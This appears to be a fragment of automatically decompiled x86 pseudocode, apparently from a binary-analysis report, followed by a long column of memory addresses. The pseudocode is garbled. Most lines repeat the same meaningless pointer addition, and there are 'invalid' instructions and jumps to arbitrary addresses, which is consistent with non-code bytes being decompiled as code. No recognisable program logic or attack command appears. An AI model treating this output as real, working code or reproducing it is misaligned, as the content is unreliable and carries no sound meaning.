				 *_t296 =  *_t296 + _t296;
				 *((intOrPtr*)(_t296 + 0x761d)) =  *((intOrPtr*)(_t296 + 0x761d)) + _t296;
				 *_t296 =  *_t296 + _t296;
				 *_t296 =  *_t296 + _t296;
				 *_t296 =  *_t296 + _t296;
				 *_t296 =  *_t296 + _t296;
				 *_t296 =  *_t296 + _t296;
				 *((intOrPtr*)(_t373 + _t361 + 0x10040)) =  *((intOrPtr*)(_t373 + _t361 + 0x10040)) + _t296;
				_push(es);
				 *((intOrPtr*)(_t394 + _t361 + 0x40)) =  *((intOrPtr*)(_t394 + _t361 + 0x40)) + _t373;
				 *_t296 =  *_t296 + _t296;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t296 =  *_t296 + _t296;
				 *_t296 =  *_t296 + _t296;
				 *_t296 =  *_t296 + _t296;
				_t297 = _t296 + 1;
				 *((intOrPtr*)(_t297 - 0x30)) =  *((intOrPtr*)(_t297 - 0x30)) + _t380;
				_t298 = _t297 + 1;
				 *_t298 =  *_t298 + _t298;
				 *_t298 =  *_t298 + _t298;
				 *_t298 =  *_t298 + _t298;
				asm("sbb eax, 0x76");
				 *_t298 =  *_t298 + _t298;
				 *_t298 =  *_t298 + _t298;
				 *_t298 =  *_t298 + _t298;
				 *_t298 =  *_t298 + _t298;
				 *_t298 =  *_t298 + _t298;
				asm("fcomp qword [ecx]");
				 *((intOrPtr*)(_t394 + 0x42)) =  *((intOrPtr*)(_t394 + 0x42)) + _t380;
				_t300 = _t298 + 0x00000001 ^ 0x2a263621;
				 *_t300 =  *_t300 + _t300;
				 *_t300 =  *_t300 + _t300;
				 *_t300 =  *_t300 + _t300;
				 *_t300 =  *_t300 + _t300;
				 *_t300 =  *_t300 + _t300;
				 *_t300 =  *_t300 + _t300;
				 *_t394 =  *_t394 + _t361;
				 *_t300 =  *_t300 + _t300;
				 *_t300 =  *_t300 + _t300;
				 *_t300 =  *_t300 + _t300;
				 *_t300 =  *_t300 + _t300;
				 *_t300 =  *_t300 + _t300;
				 *_t300 =  *_t300 + _t300;
				_t301 = _t300 |  *_t300;
				 *(_t301 + _t301) =  *(_t301 + _t301) | _t301;
				 *_t301 =  *_t301 + _t301;
				 *_t301 =  *_t301 + _t301;
				 *_t301 =  *_t301 + _t301;
				 *_t301 =  *_t301 + _t301;
				 *((intOrPtr*)(_t301 + 0x1c)) =  *((intOrPtr*)(_t301 + 0x1c)) + _t380;
				_t302 = _t301 + 1;
				 *((intOrPtr*)(_t302 - 0x10)) =  *((intOrPtr*)(_t302 - 0x10)) + _t373;
				 *_t302 =  *_t302 ^ _t302;
				_t362 = _t361 + _t361;
				asm("invalid");
				 *_t302 =  *_t302 | _t302;
				 *_t302 =  *_t302 + _t302;
				 *_t302 =  *_t302 + _t302;
				 *_t302 =  *_t302 + _t302;
				_t303 = _t302 +  *_t302;
				 *_t303 =  *_t303 + _t303;
				goto 0x74401a29;
				asm("sbb al, [eax]");
				_t304 = _t303 + 1;
				 *(_t380 + _t380) =  *(_t380 + _t380) + _t304;
				_t305 = _t304 + 1;
				 *_t305 =  *_t305 + _t362;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305;
				 *((intOrPtr*)(_t362 - 0x74000000)) =  *((intOrPtr*)(_t362 - 0x74000000)) + _t373;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *((intOrPtr*)(_t409 + 0x4b + _t380 * 2)) =  *((intOrPtr*)(_t409 + 0x4b + _t380 * 2)) + _t373;
				_t395 = _t394 - 1;
				_t411 = _t409 + 2;
				_push(_t362);
				_t196 = _t373 + 0x66;
				 *_t196 =  *((intOrPtr*)(_t373 + 0x66)) + _t305;
				_t498 =  *_t196;
				if(_t498 == 0) {
					L110:
					_t411 = _t305;
					_t305 = _t387;
					asm("lodsb");
					 *_t305 =  *_t305 + _t305;
				} else {
					if(_t498 >= 0) {
						L109:
						 *(_t305 - 0x6a2845bf) =  *(_t305 - 0x6a2845bf) ^ _t373;
						goto L110;
					} else {
						_t423 =  *(_t411 + 0x74) * 0x73;
						 *_t305 =  *_t305 + _t305;
						asm("popad");
						asm("o16 jz 0x75");
						if( *_t305 < 0) {
							_t423 =  *(_t411 + 0x74) * 0x73;
							 *_t305 =  *_t305 + _t305;
							_push(_t305);
							 *_t305 =  *_t305 + _t305;
							 *((intOrPtr*)(_t411 - 0x50520f0c)) =  *((intOrPtr*)(_t411 - 0x50520f0c)) + _t362;
							_t325 = _t362;
							_t362 = _t305;
							 *(_t411 - 0x54) =  *(_t411 - 0x54) | 0x000000ed;
							_t305 = _t325 - 0xb9;
							 *((intOrPtr*)(_t380 + 0x12d4)) = cs;
							 *_t305 =  *_t305 + _t305;
							 *_t305 =  *_t305 + _t305;
							 *_t305 =  *_t305 + _t305;
							 *_t305 =  *_t305 + _t305;
							 *_t305 =  *_t305 + _t305;
							 *_t305 =  *_t305 + _t305;
							 *_t305 =  *_t305 + _t305;
							 *_t305 =  *_t305 + _t305;
							 *_t305 =  *_t305 + _t305;
							asm("sldt word [eax]");
							 *_t305 =  *_t305 + _t305;
							 *_t305 =  *_t305 + _t305;
							 *_t305 =  *_t305 + _t305;
							 *_t305 =  *_t305 + _t305;
							 *_t305 =  *_t305 + _t305;
							 *_t305 =  *_t305 + _t305;
							 *_t305 =  *_t305 + _t305;
							 *_t305 =  *_t305 + _t305;
							 *_t305 =  *_t305 + _t305;
							 *_t305 =  *_t305 + _t305;
							asm("sbb al, [esi]");
							 *_t305 =  *_t305 + _t305;
							 *_t305 =  *_t305 + _t305;
							 *_t305 =  *_t305 + _t305;
							_push(0x4c004012);
							 *_t305 =  *_t305 + _t305;
							 *_t305 =  *_t305 + _t380;
							 *_t305 =  *_t305 + _t305;
							 *(_t373 + 0x319e6237) =  *(_t373 + 0x319e6237) & _t362;
							goto L109;
						}
					}
				}
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t373 =  *_t373 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *((intOrPtr*)(_t362 + _t305 * 4)) =  *((intOrPtr*)(_t362 + _t305 * 4)) + _t373;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *((intOrPtr*)(_t305 + 0x38)) =  *((intOrPtr*)(_t305 + 0x38)) + _t362;
				_t307 = _t305 + 1;
				 *((intOrPtr*)(_t307 + _t307 + 0x10000)) =  *((intOrPtr*)(_t307 + _t307 + 0x10000)) + _t362;
				 *_t307 =  *_t307 + _t307;
				 *_t395 = ds;
				_t308 = _t307 + 1;
				 *_t308 =  *_t308 + _t308;
				 *_t308 =  *_t308 + _t308;
				 *((intOrPtr*)(_t308 - 0xffbf44)) =  *((intOrPtr*)(_t308 - 0xffbf44)) + _t380;
				asm("invalid");
				 *_t308 =  *_t308 + 1;
				 *_t308 =  *_t308 + _t308;
				 *_t308 =  *_t308 + _t380;
				_pop(ds);
				_t309 = _t308 + 1;
				 *((intOrPtr*)(_t309 + _t380 * 8)) =  *((intOrPtr*)(_t309 + _t380 * 8)) + _t362;
				_t310 = _t309 + 1;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				_t311 = _t310 + _t380;
				asm("sbb esi, [esi]");
				 *_t311 =  *_t311 + _t311;
				 *_t311 =  *_t311 + _t311;
				 *_t311 =  *_t311 + _t311;
				 *_t311 =  *_t311 + _t311;
				 *_t311 =  *_t311 + _t311;
				 *_t311 =  *_t311 + _t311;
				 *_t362 = ds;
				_t312 = _t311 + 1;
				 *_t373 =  *_t373 + _t312;
				 *_t312 =  *_t312 + _t312;
				 *((intOrPtr*)(_t411 + 0x40)) =  *((intOrPtr*)(_t411 + 0x40)) + _t380;
				 *_t312 =  *_t312 + _t312;
				 *_t362 = ds;
				_t313 = _t312 + 1;
				 *_t373 =  *_t373 + _t313;
				 *_t313 =  *_t313 + _t313;
				 *((intOrPtr*)(_t362 + _t362 + 0x40)) =  *((intOrPtr*)(_t362 + _t362 + 0x40)) + _t380;
				 *_t313 =  *_t313 + _t313;
				asm("sbb eax, [eax]");
				 *_t313 =  *_t313 + _t313;
				 *_t313 =  *_t313 + _t313;
				_t314 = _t423;
				asm("sbb eax, [eax]");
				 *_t314 =  *_t314 + _t314;
				asm("sbb eax, [eax]");
				asm("movsb");
				asm("aad 0x40");
				 *_t314 =  *_t314 + _t314;
				 *_t314 =  *_t314 + _t314;
				_t315 = _t314 + 1;
				_t396 = 0xbc006c00;
				if (_t315 != 0) goto L112;
				asm("les esp, [0x25d40040]");
				_t316 = _t315 + 1;
				 *_t316 =  *_t316 + _t316;
				_pop(ds);
				 *((intOrPtr*)(_t316 + _t316)) =  *((intOrPtr*)(_t316 + _t316)) + _t380;
				 *_t316 =  *_t316 + _t316;
				asm("adc al, 0x21");
				_t317 = _t316 + 1;
				asm("invalid");
				 *_t317 =  *_t317 + 1;
				 *_t317 =  *_t317 + _t317;
				 *_t317 =  *_t317 + _t317;
				 *_t317 =  *_t317 + _t317;
				 *0x64400044 =  *((intOrPtr*)(0x64400044)) + 1;
				if ( *((intOrPtr*)(0x64400044)) == 0) goto L113;
				_t319 = (_t317 & 0x00000021) + 1;
				asm("invalid");
				 *_t319 =  *_t319 + 1;
				 *_t319 =  *_t319 + _t319;
				 *0x1B140048 =  *((intOrPtr*)(0x1b140048)) + _t380;
				asm("adc [eax], eax");
				_t322 = _t319 + 0x14;
				 *((intOrPtr*)(_t380 + 4)) =  *((intOrPtr*)(_t380 + 4)) + _t373;
				asm("adc al, [eax]");
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				asm("hlt");
				 *_t322 =  *_t322 + _t322;
				 *((intOrPtr*)(_t396 + 0x44)) =  *((intOrPtr*)(_t396 + 0x44)) + _t373;
				_push(ds);
				_t323 = _t322 + 1;
				 *_t323 =  *_t323 + _t323;
				 *_t323 =  *_t323 + _t323;
				 *((intOrPtr*)(_t323 - 0x43)) =  *((intOrPtr*)(_t323 - 0x43)) + _t323;
				_t324 = _t323 + 1;
				 *_t324 =  *_t324 + _t324;
				return _t324;
			}































































































































                    0x00401218
                    0x00401218
                    0x00401218
                    0x0040121d
                    0x00401222
                    0x00401224
                    0x00401226
                    0x00401228
                    0x0040122a
                    0x0040122c
                    0x0040122d
                    0x0040122f
                    0x00401231
                    0x00401233
                    0x00401235
                    0x00401237
                    0x00401238
                    0x00401239
                    0x0040123b
                    0x0040123c
                    0x0040123c
                    0x0040123d
                    0x00401242
                    0x00401243
                    0x00401245
                    0x00401247
                    0x00401249
                    0x0040124b
                    0x0040124d
                    0x0040124f
                    0x00401252
                    0x00401254
                    0x00401255
                    0x00401258
                    0x004012c5
                    0x004012c5
                    0x004012c6
                    0x0040125a
                    0x0040125e
                    0x00401260
                    0x00401262
                    0x00401264
                    0x00401266
                    0x00401268
                    0x0040126a
                    0x0040126c
                    0x0040126d
                    0x00401272
                    0x00401272
                    0x00401273
                    0x00401277
                    0x00401279
                    0x0040127f
                    0x00401280
                    0x00401283
                    0x00401285
                    0x0040128a
                    0x0040128c
                    0x00401290
                    0x00401291
                    0x00401292
                    0x00401294
                    0x0040129a
                    0x0040129b
                    0x004012a1
                    0x004012a3
                    0x004012a5
                    0x004012a7
                    0x004012a9
                    0x004012ab
                    0x004012ad
                    0x004012af
                    0x004012b1
                    0x004012b3
                    0x004012b5
                    0x004012b7
                    0x004012b9
                    0x004012bb
                    0x004012bd
                    0x004012bf
                    0x004012c1
                    0x00000000
                    0x004012c1
                    0x00401283
                    0x004012c8
                    0x004012ca
                    0x004012cc
                    0x004012cd
                    0x004012cf
                    0x00401347
                    0x00401347
                    0x00401347
                    0x00401349
                    0x0040134a
                    0x00000000
                    0x0040134c
                    0x0040134c
                    0x00401350
                    0x00401351
                    0x00401353
                    0x00401355
                    0x00401358
                    0x0040135b
                    0x0040135d
                    0x00401362
                    0x00401363
                    0x00401366
                    0x00401368
                    0x0040136a
                    0x0040136c
                    0x0040136e
                    0x00401370
                    0x00401375
                    0x00401376
                    0x00401379
                    0x0040137b
                    0x00401386
                    0x0040138d
                    0x0040138f
                    0x00401391
                    0x00401394
                    0x00401396
                    0x00000000
                    0x00401396
                    0x00401351
                    0x004012d2
                    0x004012d2
                    0x004012d4
                    0x004012d5
                    0x004012d8
                    0x004012dd
                    0x004012de
                    0x004012df
                    0x004012e1
                    0x004012ea
                    0x004012ec
                    0x004012ed
                    0x004012f0
                    0x004012f3
                    0x004012f4
                    0x004012f6
                    0x00401301
                    0x00401303
                    0x00401306
                    0x00401309
                    0x0040130b
                    0x0040130b
                    0x0040130c
                    0x00401311
                    0x00401312
                    0x00401314
                    0x00401317
                    0x00401319
                    0x0040131f
                    0x00401320
                    0x00401323
                    0x00401323
                    0x00401329
                    0x0040139f
                    0x0040139f
                    0x004013a0
                    0x004013a3
                    0x00000000
                    0x0040132c
                    0x0040132c
                    0x00401397
                    0x00401397
                    0x00401399
                    0x0040139b
                    0x0040139d
                    0x00000000
                    0x0040132e
                    0x0040132e
                    0x004013a4
                    0x004013a4
                    0x004013a7
                    0x004013aa
                    0x004013ac
                    0x004013af
                    0x004013b4
                    0x004013b6
                    0x004013bc
                    0x004013be
                    0x004013c1
                    0x004013c1
                    0x004013c1
                    0x004013c2
                    0x004013c4
                    0x00401331
                    0x00401335
                    0x00401339
                    0x0040133a
                    0x0040133f
                    0x00401341
                    0x00401343
                    0x00401345
                    0x00000000
                    0x00401345
                    0x0040132e
                    0x0040132c
                    0x00401329
                    0x004013c7
                    0x004013c9
                    0x004013ce
                    0x004013cf
                    0x004013d0
                    0x004013d1
                    0x004013d2
                    0x004013d3
                    0x004013d4
                    0x004013d6
                    0x004013d8
                    0x004013db
                    0x004013dc
                    0x004013e3
                    0x004013e9
                    0x004013ec
                    0x004013f0
                    0x004013f2
                    0x004013f4
                    0x004013f6
                    0x004013f7
                    0x004013f9
                    0x004013fa
                    0x00401475
                    0x00401475
                    0x0040147b
                    0x0040147d
                    0x0040147e
                    0x00000000
                    0x004013fc
                    0x004013fc
                    0x004013ff
                    0x00401408
                    0x00401408
                    0x00401408
                    0x0040140b
                    0x0040140c
                    0x0040140e
                    0x0040140f
                    0x0040147f
                    0x0040147f
                    0x00401481
                    0x00401482
                    0x00401484
                    0x00401486
                    0x00000000
                    0x00401411
                    0x00401411
                    0x00401488
                    0x00401488
                    0x00401488
                    0x00401489
                    0x004014f7
                    0x00000000
                    0x0040148b
                    0x0040148b
                    0x00401506
                    0x00401508
                    0x0040150f
                    0x00401514
                    0x00401515
                    0x00401516
                    0x00401518
                    0x0040151a
                    0x0040151a
                    0x0040151a
                    0x0040151d
                    0x00000000
                    0x0040151f
                    0x0040151f
                    0x00401522
                    0x00000000
                    0x00401524
                    0x00401524
                    0x0040152b
                    0x0040152d
                    0x0040152f
                    0x00401532
                    0x00401539
                    0x0040153b
                    0x00401541
                    0x00401544
                    0x00401546
                    0x00401549
                    0x0040154a
                    0x0040154b
                    0x0040154f
                    0x00401550
                    0x00401551
                    0x00401552
                    0x00000000
                    0x00401555
                    0x00401555
                    0x00401555
                    0x00401559
                    0x0040155b
                    0x00000000
                    0x0040155b
                    0x00000000
                    0x00401559
                    0x00401552
                    0x00401522
                    0x0040148d
                    0x0040148d
                    0x00000000
                    0x0040148f
                    0x0040148f
                    0x004014ff
                    0x004014ff
                    0x00401500
                    0x00000000
                    0x00401491
                    0x00401491
                    0x004014f9
                    0x004014f9
                    0x004014fa
                    0x004014fc
                    0x00000000
                    0x00401494
                    0x00401494
                    0x00401496
                    0x00401498
                    0x00401499
                    0x0040149b
                    0x0040149e
                    0x00000000
                    0x0040149e
                    0x00401491
                    0x0040148f
                    0x0040148d
                    0x0040148b
                    0x00401413
                    0x00401413
                    0x00401416
                    0x00401418
                    0x0040141d
                    0x0040141e
                    0x0040141f
                    0x00401421
                    0x00401427
                    0x00401429
                    0x0040142b
                    0x00401431
                    0x00401432
                    0x00401433
                    0x00401434
                    0x00401435
                    0x00401436
                    0x00401438
                    0x0040143a
                    0x0040143a
                    0x0040143a
                    0x0040143d
                    0x004014a0
                    0x004014a0
                    0x004014a3
                    0x004014a8
                    0x004014a9
                    0x004014ab
                    0x004014ad
                    0x004014af
                    0x004014b1
                    0x00000000
                    0x0040143f
                    0x0040143f
                    0x00401440
                    0x00401442
                    0x004014b6
                    0x004014b6
                    0x004014b8
                    0x004014bb
                    0x004014bd
                    0x004014be
                    0x004014c0
                    0x004014c0
                    0x004014c3
                    0x004014c4
                    0x00000000
                    0x00401444
                    0x0040144b
                    0x0040144c
                    0x00401452
                    0x00401454
                    0x00401456
                    0x00401458
                    0x0040145a
                    0x0040145a
                    0x0040145a
                    0x0040145d
                    0x004014d3
                    0x004014d5
                    0x004014d7
                    0x004014d9
                    0x004014db
                    0x004014e1
                    0x004014e4
                    0x004014e5
                    0x004014e6
                    0x0040155c
                    0x0040155c
                    0x0040155e
                    0x0040155e
                    0x00401562
                    0x00401564
                    0x00401569
                    0x0040156a
                    0x0040156a
                    0x0040156a
                    0x0040156d
                    0x0040156e
                    0x004015e3
                    0x00000000
                    0x00401570
                    0x00401570
                    0x004015e4
                    0x004015e4
                    0x004015e4
                    0x004015e6
                    0x004015e7
                    0x004015e8
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00401572
                    0x00401572
                    0x004015ea
                    0x004015ea
                    0x0040165e
                    0x0040165e
                    0x0040165f
                    0x00401661
                    0x00401665
                    0x00401667
                    0x0040166a
                    0x0040166d
                    0x0040166f
                    0x00401670
                    0x00401672
                    0x00401673
                    0x00401674
                    0x00401675
                    0x00401676
                    0x00401678
                    0x0040167b
                    0x0040167c
                    0x0040167d
                    0x0040167e
                    0x004015ec
                    0x004015ec
                    0x00401652
                    0x00401652
                    0x00401653
                    0x00401653
                    0x00401654
                    0x0040165b
                    0x0040165d
                    0x00000000
                    0x004015ee
                    0x004015ee
                    0x004015f0
                    0x004015f2
                    0x004015f4
                    0x004015f7
                    0x004015fa
                    0x004015fb
                    0x004015fc
                    0x00401604
                    0x00401605
                    0x00401606
                    0x00401608
                    0x0040160a
                    0x0040160c
                    0x0040160e
                    0x00401610
                    0x00401612
                    0x00401613
                    0x00401615
                    0x00401616
                    0x00401618
                    0x0040161a
                    0x0040161a
                    0x0040161e
                    0x00401621
                    0x00401622
                    0x00401626
                    0x0040162c
                    0x00401632
                    0x00401634
                    0x00401636
                    0x00401638
                    0x0040163a
                    0x0040163b
                    0x00401640
                    0x00401641
                    0x00401641
                    0x00401642
                    0x00401643
                    0x00401645
                    0x0040164b
                    0x0040164c
                    0x0040164d
                    0x00401650
                    0x00401651
                    0x00000000
                    0x00401651
                    0x0040161e
                    0x004015ec
                    0x00401575
                    0x00401575
                    0x00401578
                    0x0040157b
                    0x00401581
                    0x00401584
                    0x00401584
                    0x00401589
                    0x0040158b
                    0x0040158e
                    0x00401593
                    0x00401594
                    0x00401594
                    0x00401596
                    0x00401598
                    0x0040159c
                    0x0040159e
                    0x004015a0
                    0x004015a1
                    0x004015a3
                    0x004015a9
                    0x004015aa
                    0x004015ab
                    0x004015b1
                    0x004015b3
                    0x004015b6
                    0x004015b7
                    0x004015b9
                    0x004015bc
                    0x004015be
                    0x004015c0
                    0x004015c0
                    0x004015c0
                    0x00401572
                    0x00401570
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040145f
                    0x0040145f
                    0x004014c6
                    0x004014c6
                    0x00401461
                    0x00401461
                    0x00401462
                    0x0040146a
                    0x0040146a
                    0x0040146a
                    0x0040146d
                    0x004014e8
                    0x004014e8
                    0x004014ed
                    0x004014ef
                    0x004014ef
                    0x004014ef
                    0x004014f2
                    0x004014f4
                    0x004014f4
                    0x0040146f
                    0x0040146f
                    0x00401470
                    0x00401473
                    0x00000000
                    0x00401473
                    0x0040146d
                    0x0040145f
                    0x0040145d
                    0x00401442
                    0x0040143d
                    0x00401411
                    0x0040140f
                    0x00401682
                    0x00401684
                    0x00401685
                    0x00401686
                    0x00401688
                    0x00401689
                    0x0040168b
                    0x0040168d
                    0x0040168f
                    0x00401691
                    0x00401697
                    0x0040169c
                    0x0040169e
                    0x0040169e
                    0x004016a1
                    0x004016a2
                    0x004016a5
                    0x00401717
                    0x00401717
                    0x00401718
                    0x0040171d
                    0x0040171f
                    0x00401721
                    0x00401724
                    0x00401726
                    0x00401728
                    0x0040172b
                    0x0040172d
                    0x00401734
                    0x00000000
                    0x004016a7
                    0x004016a7
                    0x004016a8
                    0x004016a9
                    0x004016ac
                    0x004016b4
                    0x004016b6
                    0x004016b8
                    0x004016bb
                    0x004016bd
                    0x004016bd
                    0x004016c2
                    0x004016c6
                    0x004016c7
                    0x00401739
                    0x00401739
                    0x0040173a
                    0x0040173b
                    0x00000000
                    0x004016cb
                    0x004016cb
                    0x00401735
                    0x00401735
                    0x00401738
                    0x00000000
                    0x004016cf
                    0x004016cf
                    0x004016d0
                    0x0040173d
                    0x0040173d
                    0x00401741
                    0x00000000
                    0x004016d2
                    0x004016d2
                    0x004016d4
                    0x004016d5
                    0x004016e0
                    0x004016e1
                    0x004016e6
                    0x004016e9
                    0x004016eb
                    0x004016f1
                    0x004016f3
                    0x004016f6
                    0x004016f8
                    0x004016fd
                    0x004016fe
                    0x004016ff
                    0x00401701
                    0x00401703
                    0x00401703
                    0x00401703
                    0x00401706
                    0x00401707
                    0x0040170f
                    0x00401711
                    0x00401713
                    0x00000000
                    0x00401713
                    0x00401745
                    0x00401745
                    0x0040174b
                    0x0040174c
                    0x00401750
                    0x00401752
                    0x00401759
                    0x00401760
                    0x00401761
                    0x00401762
                    0x00401763
                    0x00401764
                    0x00401765
                    0x00401766
                    0x00401767
                    0x00401768
                    0x0040176e
                    0x00401770
                    0x00401775
                    0x00401777
                    0x00401779
                    0x0040177b
                    0x0040177b
                    0x0040170f
                    0x004016d0
                    0x004016cb
                    0x004016c7
                    0x0040177c
                    0x0040177e
                    0x0040177f
                    0x00401783
                    0x00401784
                    0x00401786
                    0x0040178a
                    0x0040178b
                    0x0040178c
                    0x0040178d
                    0x00401793
                    0x00401797
                    0x00401799
                    0x0040179b
                    0x0040179d
                    0x0040179f
                    0x004017a1
                    0x004017a1
                    0x004017a3
                    0x0040180a
                    0x0040180a
                    0x0040180c
                    0x0040180d
                    0x0040180e
                    0x0040180f
                    0x00000000
                    0x004017a5
                    0x004017a5
                    0x00401810
                    0x00401810
                    0x00401811
                    0x00401812
                    0x00401814
                    0x00401817
                    0x00401818
                    0x00401819
                    0x00401820
                    0x00401821
                    0x00401824
                    0x00401829
                    0x0040182a
                    0x0040182b
                    0x0040182c
                    0x0040182d
                    0x00401830
                    0x00401832
                    0x00401834
                    0x00401836
                    0x00401837
                    0x00401837
                    0x00401839
                    0x0040183a
                    0x0040183e
                    0x00401841
                    0x00401842
                    0x00401844
                    0x00000000
                    0x00401844
                    0x004017a7
                    0x004017a7
                    0x00000000
                    0x004017a9
                    0x004017a9
                    0x004017ad
                    0x004017af
                    0x004017b1
                    0x004017b5
                    0x004017b8
                    0x004017b9
                    0x004017ba
                    0x004017bb
                    0x004017c3
                    0x004017c4
                    0x004017c5
                    0x004017c6
                    0x004017c8
                    0x004017ca
                    0x004017cc
                    0x004017ce
                    0x004017d1
                    0x004017d1
                    0x004017d1
                    0x004017d4
                    0x004017d5
                    0x00401846
                    0x0040184b
                    0x0040184f
                    0x00401850
                    0x00401855
                    0x0040185e
                    0x00401860
                    0x00401861
                    0x00401862
                    0x00401865
                    0x00401866
                    0x00401867
                    0x0040186c
                    0x0040186f
                    0x00401870
                    0x00401871
                    0x00401872
                    0x00401878
                    0x00401879
                    0x0040187c
                    0x0040187e
                    0x00401880
                    0x00401883
                    0x00401885
                    0x00401887
                    0x0040188e
                    0x0040188f
                    0x00401896
                    0x00401898
                    0x0040189a
                    0x0040189c
                    0x0040189e
                    0x004018a0
                    0x004018a2
                    0x004018a4
                    0x004017d7
                    0x004017d7
                    0x004017d8
                    0x00401845
                    0x00401845
                    0x00000000
                    0x004017da
                    0x004017da
                    0x004017db
                    0x004017e2
                    0x004017e3
                    0x004017e5
                    0x004017e7
                    0x004017e9
                    0x004017eb
                    0x004017ed
                    0x004017ee
                    0x004017f4
                    0x004017f9
                    0x004017fb
                    0x004017fd
                    0x004017ff
                    0x00401801
                    0x00401806
                    0x00401807
                    0x00401808
                    0x00401809
                    0x00000000
                    0x00401809
                    0x004017d8
                    0x004017d5
                    0x004017a7
                    0x004017a5
                    0x004018a6
                    0x004018a7
                    0x004018ad
                    0x004018af
                    0x004018b1
                    0x004018b4
                    0x004018b6
                    0x004018b8
                    0x004018ba
                    0x004018bc
                    0x004018be
                    0x004018c0
                    0x004018c2
                    0x004018c3
                    0x004018c5
                    0x004018c7
                    0x004018ce
                    0x004018d0
                    0x004018d2
                    0x004018d4
                    0x004018d6
                    0x004018d8
                    0x004018da
                    0x004018dd
                    0x004018de
                    0x004018df
                    0x004018e1
                    0x004018e4
                    0x004018e6
                    0x004018e8
                    0x004018e9
                    0x004018ee
                    0x004018f0
                    0x004018f2
                    0x004018f4
                    0x004018f6
                    0x004018f8
                    0x004018f9
                    0x004018fc
                    0x00401900
                    0x00401902
                    0x00401903
                    0x00401905
                    0x00401907
                    0x00401909
                    0x0040190b
                    0x0040190d
                    0x0040190f
                    0x00401911
                    0x00401913
                    0x00401916
                    0x00401917
                    0x0040191a
                    0x0040191b
                    0x0040191d
                    0x0040191f
                    0x00401925
                    0x00401927
                    0x00401929
                    0x0040192b
                    0x0040192d
                    0x0040192f
                    0x00401932
                    0x00401933
                    0x00401935
                    0x00401938
                    0x0040193a
                    0x0040193b
                    0x0040193d
                    0x0040193f
                    0x00401941
                    0x00401943
                    0x00401945
                    0x00401947
                    0x00401949
                    0x0040194b
                    0x00401951
                    0x00401954
                    0x00401956
                    0x00401958
                    0x0040195f
                    0x00401961
                    0x00401963
                    0x00401965
                    0x00401967
                    0x0040196b
                    0x0040196d
                    0x00401973
                    0x00401975
                    0x00401977
                    0x00401979
                    0x0040197b
                    0x0040197d
                    0x0040197f
                    0x00401981
                    0x00401985
                    0x00401986
                    0x00401987
                    0x0040198a
                    0x0040198b
                    0x0040198d
                    0x0040198f
                    0x00401995
                    0x00401997
                    0x00401999
                    0x0040199b
                    0x0040199d
                    0x0040199f
                    0x004019a6
                    0x004019a7
                    0x004019ae
